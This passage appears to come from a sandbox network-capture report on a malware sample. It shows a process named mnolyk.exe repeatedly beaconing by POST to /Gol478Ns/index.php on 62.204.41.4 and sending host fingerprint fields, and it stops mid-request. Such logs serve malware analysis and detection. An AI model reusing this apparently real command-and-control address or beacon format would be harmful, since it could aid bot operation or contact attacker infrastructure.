                                                                      Feb 6, 2023 18:37:33.107430935 CET | 803 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      344 | 192.168.2.7 | 50072 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:33.278393030 CET | 804 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.342987061 CET | 804 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      345 | 192.168.2.7 | 50073 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:33.536848068 CET | 805 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.602340937 CET | 805 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      346 | 192.168.2.7 | 50074 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:33.782820940 CET | 806 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.846342087 CET | 806 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      347 | 192.168.2.7 | 50075 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:34.012824059 CET | 807 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.078227997 CET | 807 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      348 | 192.168.2.7 | 50076 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:34.245536089 CET | 808 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.309325933 CET | 808 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      349 | 192.168.2.7 | 50077 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:34.482978106 CET | 809 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.547892094 CET | 809 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      35 | 192.168.2.7 | 49759 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:06.092267990 CET | 467 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.159295082 CET | 467 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      350 | 192.168.2.7 | 50078 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:34.718344927 CET | 810 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.786504030 CET | 810 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      351 | 192.168.2.7 | 50079 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:34.965163946 CET | 811 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.029045105 CET | 811 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      352 | 192.168.2.7 | 50080 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:35.199980974 CET | 812 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.266577959 CET | 812 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      353 | 192.168.2.7 | 50081 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:35.445260048 CET | 813 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.510221958 CET | 813 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      354 | 192.168.2.7 | 50082 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:35.692289114 CET | 814 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.761848927 CET | 814 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      355 | 192.168.2.7 | 50083 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:35.944830894 CET | 815 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.011137009 CET | 815 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      356 | 192.168.2.7 | 50084 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:36.184166908 CET | 816 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.250062943 CET | 816 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      357 | 192.168.2.7 | 50085 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:36.424990892 CET | 817 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.505920887 CET | 817 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      358 | 192.168.2.7 | 50086 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:36.704777002 CET | 818 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.768732071 CET | 818 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      359 | 192.168.2.7 | 50087 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:36.937901020 CET | 819 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.001657009 CET | 819 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      36 | 192.168.2.7 | 49760 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:06.332166910 CET | 467 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.398762941 CET | 468 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      360 | 192.168.2.7 | 50088 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:37.171595097 CET | 820 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
